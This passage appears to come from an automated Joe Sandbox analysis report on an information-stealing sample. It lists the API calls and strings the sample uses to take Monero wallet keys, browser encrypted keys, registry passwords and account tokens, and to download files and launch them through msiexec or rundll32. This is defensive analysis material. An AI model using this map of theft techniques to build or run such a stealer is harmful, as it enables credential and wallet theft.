                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: 3d55b6d7c4890995c8db1c1c854b7bafbe35527043837843d5643316e328c173
                                • Instruction ID: d2e2f4116cdfd421aa8644d00ab1846b390cc331e0902c7c984695dd652bb982
                                • Opcode Fuzzy Hash: 3d55b6d7c4890995c8db1c1c854b7bafbe35527043837843d5643316e328c173
                                • Instruction Fuzzy Hash: F871BAB5910208EBDB04EFE8DC89FEEB7B9AF48700F148658F515E7290DB74A905CB61
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B831C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B8335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00B834EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 68e54d02a9922b7f012766c4711e990a85408a79182fe1df2404d73e53734b70
                                • Instruction ID: 9319d15e527a5ba7e69214c1cc057fbca5edc0ab1b0a46d89af4f61b2aedfc80
                                • Opcode Fuzzy Hash: 68e54d02a9922b7f012766c4711e990a85408a79182fe1df2404d73e53734b70
                                • Instruction Fuzzy Hash: 9D12B1718101189AEB15FBA0DC92FDDB7B8AF14700F5041EAF506761A1EF786B4ACF62
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B76280: InternetOpenA.WININET(00B90DFE,00000001,00000000,00000000,00000000), ref: 00B762E1
                                  • Part of subcall function 00B76280: StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76303
                                  • Part of subcall function 00B76280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B76335
                                  • Part of subcall function 00B76280: HttpOpenRequestA.WININET(00000000,GET,?,0093D8A8,00000000,00000000,00400100,00000000), ref: 00B76385
                                  • Part of subcall function 00B76280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B763BF
                                  • Part of subcall function 00B76280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B763D1
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B85318
                                • lstrlen.KERNEL32(00000000), ref: 00B8532F
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00B85364
                                • lstrlen.KERNEL32(00000000), ref: 00B85383
                                • lstrlen.KERNEL32(00000000), ref: 00B853AE
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 86f2aa2ec6726d1cf1d31a6ef886599251aefddd58a6c0cc81217d1e02089553
                                • Instruction ID: cd9db12b7198c8494e0cf970f24cb45f7f25df418e4b5ba042aa9385c3f2f17e
                                • Opcode Fuzzy Hash: 86f2aa2ec6726d1cf1d31a6ef886599251aefddd58a6c0cc81217d1e02089553
                                • Instruction Fuzzy Hash: 8251FD30910148DBEB18FF64CD96AED77B9AF10301F504499F40A6A5B2EF386B45DB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: 5d6b449b257902292dd4750ccaad6a8696f11b41a2d5204842db0d4142533726
                                • Instruction ID: 528ab57c33dadaa44a15046c54b926d0a48b71f842101f929b03232cfda97ac0
                                • Opcode Fuzzy Hash: 5d6b449b257902292dd4750ccaad6a8696f11b41a2d5204842db0d4142533726
                                • Instruction Fuzzy Hash: 64C181B5900219DBCB14FF64DC89FEA73B8BB54304F0045DDE50AA7261EA74AA85CFA1
                                APIs
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00B842EC
                                • lstrcat.KERNEL32(?,0093DF08), ref: 00B8430B
                                • lstrcat.KERNEL32(?,?), ref: 00B8431F
                                • lstrcat.KERNEL32(?,0093CE98), ref: 00B84333
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88D90: GetFileAttributesA.KERNEL32(00000000,?,00B71B54,?,?,00B9564C,?,?,00B90E1F), ref: 00B88D9F
                                  • Part of subcall function 00B79CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B79D39
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B893C0: GlobalAlloc.KERNEL32(00000000,00B843DD,00B843DD), ref: 00B893D3
                                • StrStrA.SHLWAPI(?,0093DFB0), ref: 00B843F3
                                • GlobalFree.KERNEL32(?), ref: 00B84512
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79AEF
                                  • Part of subcall function 00B79AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B74EEE,00000000,?), ref: 00B79B01
                                  • Part of subcall function 00B79AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B74EEE,00000000,00000000), ref: 00B79B2A
                                  • Part of subcall function 00B79AC0: LocalFree.KERNEL32(?,?,?,?,00B74EEE,00000000,?), ref: 00B79B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00B844A3
                                • StrCmpCA.SHLWAPI(?,00B908D1), ref: 00B844C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B844D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00B844E5
                                • lstrcat.KERNEL32(00000000,00B90FB8), ref: 00B844F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: cb8df60edf3ce9d4a672bdc4baf064eb01715480f486e0f213236d7c8a994436
                                • Instruction ID: cd9e0fc463bbc988bff7145646082a7a89f1ab53873d36274591ff29bfde0fa1
                                • Opcode Fuzzy Hash: cb8df60edf3ce9d4a672bdc4baf064eb01715480f486e0f213236d7c8a994436
                                • Instruction Fuzzy Hash: EE7144B6900208BBDB14FBB4DC85FEE73B9AB58300F0485D8F61997191EA34DB45DBA1
                                APIs
                                  • Part of subcall function 00B712A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B712B4
                                  • Part of subcall function 00B712A0: RtlAllocateHeap.NTDLL(00000000), ref: 00B712BB
                                  • Part of subcall function 00B712A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B712D7
                                  • Part of subcall function 00B712A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B712F5
                                  • Part of subcall function 00B712A0: RegCloseKey.ADVAPI32(?), ref: 00B712FF
                                • lstrcat.KERNEL32(?,00000000), ref: 00B7134F
                                • lstrlen.KERNEL32(?), ref: 00B7135C
                                • lstrcat.KERNEL32(?,.keys), ref: 00B71377
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B88B60: GetSystemTime.KERNEL32(00B90E1A,00939FD8,00B905AE,?,?,00B713F9,?,0000001A,00B90E1A,00000000,?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B88B86
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B71465
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                • DeleteFileA.KERNEL32(00000000), ref: 00B714EF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                • API String ID: 3478931302-218353709
                                • Opcode ID: 9337e8bc8ee9d03ac8b8c6d5c41c154595e68b306f096c44325004b26ceaace5
                                • Instruction ID: 13b6533f6f80c584c229bb7070754622f2e6d282bec3880f31c025ca3f845c61
                                • Opcode Fuzzy Hash: 9337e8bc8ee9d03ac8b8c6d5c41c154595e68b306f096c44325004b26ceaace5
                                • Instruction Fuzzy Hash: AC5155B1D5011897DB15FB64DC92FED73BCAF50300F4045E9B60AA20A1EE346B89CBA6
                                APIs
                                  • Part of subcall function 00B772D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B7733A
                                  • Part of subcall function 00B772D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B773B1
                                  • Part of subcall function 00B772D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B7740D
                                  • Part of subcall function 00B772D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00B77452
                                  • Part of subcall function 00B772D0: HeapFree.KERNEL32(00000000), ref: 00B77459
                                • lstrcat.KERNEL32(00000000,00B917FC), ref: 00B77606
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B77648
                                • lstrcat.KERNEL32(00000000, : ), ref: 00B7765A
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B7768F
                                • lstrcat.KERNEL32(00000000,00B91804), ref: 00B776A0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00B776D3
                                • lstrcat.KERNEL32(00000000,00B91808), ref: 00B776ED
                                • task.LIBCPMTD ref: 00B776FB
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                • String ID: :
                                • API String ID: 2677904052-3653984579
                                • Opcode ID: 4b5552f95f676329fcb2934712120f2c10882bdf40153cad156012cb5caa75ac
                                • Instruction ID: 57965a1aa515917df2518f10b2f021a7e1b86f76c5d2d05f911aa5e205189b8c
                                • Opcode Fuzzy Hash: 4b5552f95f676329fcb2934712120f2c10882bdf40153cad156012cb5caa75ac
                                • Instruction Fuzzy Hash: CF3163B5940209EFCB04EBB8DC89DFF73B8BB44301B148258F116A7260DE34A946DB61
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0093DB00,00000000,?,00B90E2C,00000000,?,00000000), ref: 00B88130
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B88137
                                • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B88158
                                • __aulldiv.LIBCMT ref: 00B88172
                                • __aulldiv.LIBCMT ref: 00B88180
                                • wsprintfA.USER32 ref: 00B881AC
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                • String ID: %d MB$@
                                • API String ID: 2774356765-3474575989
                                • Opcode ID: 925c5db78b2afba5c9d3e6a2304bece14d2ca697b7b23c17d513a92fad75cb6c
                                • Instruction ID: e4c3f350e62b2111bf2892f21851c5da93e0d831dd5f5fa8ed2a0e5915d8da5a
                                • Opcode Fuzzy Hash: 925c5db78b2afba5c9d3e6a2304bece14d2ca697b7b23c17d513a92fad75cb6c
                                • Instruction Fuzzy Hash: 3421F9B1E44218EBDB04EFD4CC49FAEB7B8EB48B10F104659F605BB290DB7859018BA5
                                APIs
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B74839
                                  • Part of subcall function 00B747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B74849
                                • InternetOpenA.WININET(00B90DF7,00000001,00000000,00000000,00000000), ref: 00B7610F
                                • StrCmpCA.SHLWAPI(?,0093E310), ref: 00B76147
                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B7618F
                                • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B761B3
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 00B761DC
                                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B7620A
                                • CloseHandle.KERNEL32(?,?,00000400), ref: 00B76249
                                • InternetCloseHandle.WININET(?), ref: 00B76253
                                • InternetCloseHandle.WININET(00000000), ref: 00B76260
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                • String ID:
                                • API String ID: 2507841554-0
                                • Opcode ID: 80b692f42d8301a1aeed4769eb45e92f5ddcf79775e90d5c5bc0c382bc71c170
                                • Instruction ID: 36fcb6f2a1154ec1c9d87d9edc6c9bb82cfa0e0756e346d9ba849c389971799a
                                • Opcode Fuzzy Hash: 80b692f42d8301a1aeed4769eb45e92f5ddcf79775e90d5c5bc0c382bc71c170
                                • Instruction Fuzzy Hash: 85516FB1900618EBEB20DF54DC49BEE77B8EB44701F1081D8B609B72D1DB746A89CFA5
                                APIs
                                • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B7733A
                                • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B773B1
                                • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B7740D
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00B77452
                                • HeapFree.KERNEL32(00000000), ref: 00B77459
                                • task.LIBCPMTD ref: 00B77555
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Heap$EnumFreeOpenProcessValuetask
                                • String ID: Password
                                • API String ID: 775622407-3434357891
                                • Opcode ID: 464b42013e5c505d92530aa98db7001c9532862136c0a7181e5bfdd98f09e9d8
                                • Instruction ID: 8f24432964794330e4249dd0d1b6e229fcdcc240a210250fa071a699e06119aa
                                • Opcode Fuzzy Hash: 464b42013e5c505d92530aa98db7001c9532862136c0a7181e5bfdd98f09e9d8
                                • Instruction Fuzzy Hash: C161F7B59442689BDB24DB50DC85BDAB7F8BF48300F0081E9E65DA6241DFB05BC9CFA1
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                • lstrlen.KERNEL32(00000000), ref: 00B7BC9F
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • StrStrA.SHLWAPI(00000000,AccountId), ref: 00B7BCCD
                                • lstrlen.KERNEL32(00000000), ref: 00B7BDA5
                                • lstrlen.KERNEL32(00000000), ref: 00B7BDB9
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                                • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                • API String ID: 3073930149-1079375795
                                • Opcode ID: f64068d1bf914bc0a2266021e94e64a7761af3adca8955f7e6b245b87737b1e4
                                • Instruction ID: 9fc5cf0196c3ef9c8f22831a7b196aab928b32fbb43c9828ddb19f328fbec625
                                • Opcode Fuzzy Hash: f64068d1bf914bc0a2266021e94e64a7761af3adca8955f7e6b245b87737b1e4
                                • Instruction Fuzzy Hash: FBB116719101049BEF14FBA4DD96EEE73B8AF54300F4045A9F506B61A1EF386A49CB72
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: ExitProcess$DefaultLangUser
                                • String ID: *
                                • API String ID: 1494266314-163128923
                                • Opcode ID: 425a340f8062402f25dd3976f0819fb7b5878c3a3efdfe2e77caa57c1578dbe0
                                • Instruction ID: af790af2707967f38f16c236668853d95fbf665a9c647fd78c93988d6247f79c
                                • Opcode Fuzzy Hash: 425a340f8062402f25dd3976f0819fb7b5878c3a3efdfe2e77caa57c1578dbe0
                                • Instruction Fuzzy Hash: CEF03A34D08349EFE344AFE8A90972C7B70FB04702F040299E609C6390DA724E41DBE6
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00B74FCA
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B74FD1
                                • InternetOpenA.WININET(00B90DDF,00000000,00000000,00000000,00000000), ref: 00B74FEA
                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00B75011
                                • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00B75041
                                • InternetCloseHandle.WININET(?), ref: 00B750B9
                                • InternetCloseHandle.WININET(?), ref: 00B750C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                • String ID:
                                • API String ID: 3066467675-0
                                • Opcode ID: 3ae585b8b70c08258008bcbcabf2672b615c34c71b613e9b77226358c83e2eae
                                • Instruction ID: d6d248ffd15abf3816c7cfb56130999690023d6293c1dc201bafef8574a0130d
                                • Opcode Fuzzy Hash: 3ae585b8b70c08258008bcbcabf2672b615c34c71b613e9b77226358c83e2eae
                                • Instruction Fuzzy Hash: 87310AB4A00218EBDB20DF54DC85BDCB7B4EB48704F1081D9E709A7281DB706EC58FA9
                                APIs
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00B88426
                                • wsprintfA.USER32 ref: 00B88459
